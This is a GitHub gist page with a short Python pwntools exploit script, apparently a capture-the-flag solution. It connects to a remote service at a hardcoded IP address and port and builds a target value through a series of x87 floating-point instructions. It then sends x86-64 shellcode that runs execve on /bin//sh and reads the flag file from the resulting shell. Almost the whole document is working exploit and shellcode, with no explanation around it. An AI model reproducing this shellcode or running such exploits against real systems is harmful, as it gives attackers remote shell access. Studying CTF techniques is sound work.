Last active
June 18, 2023 04:13
-
-
Save dfyz/2c38d386a64c6ac68d5af95612104861 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
# padding; push 0; ret | |
TARGET = int.from_bytes(b'\x00\x00\x6a\x00\xc3', byteorder='little') | |
PROMPT = b': ' | |
SHELLCODE = r''' | |
xor eax, eax | |
xor rdx, rdx | |
xor rsi, rsi | |
movabs rbx, 0x68732f2f6e69622f | |
push rbx | |
push rsp | |
pop rdi | |
mov al, 0x3b | |
syscall | |
''' | |
with remote('3.38.149.80', 20001) as tube: | |
def run_x87(cmd): | |
full_cmd = flat(b'\x90\x90', cmd) | |
tube.sendlineafter(PROMPT, full_cmd.hex().encode()) | |
load_one = lambda: run_x87(b'\xd9\xe8') # fld1 | |
double = lambda: run_x87(b'\xd8\xc0') # fadd st0, st0 | |
add_one = lambda: run_x87(b'\xd8\xc1') # fadd st0, st1 | |
load_one() | |
load_one() | |
for bit in range(TARGET.bit_length() - 2, -1, -1): | |
double() | |
if TARGET & (1 << bit): | |
add_one() | |
tube.sendlineafter(PROMPT, flat( | |
asm(SHELLCODE, arch='amd64'), | |
b'\xdf\x38' # fistp qword ptr [rax] | |
).hex().encode()) | |
tube.sendline(b'cat flag') | |
print(tube.recvline()) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment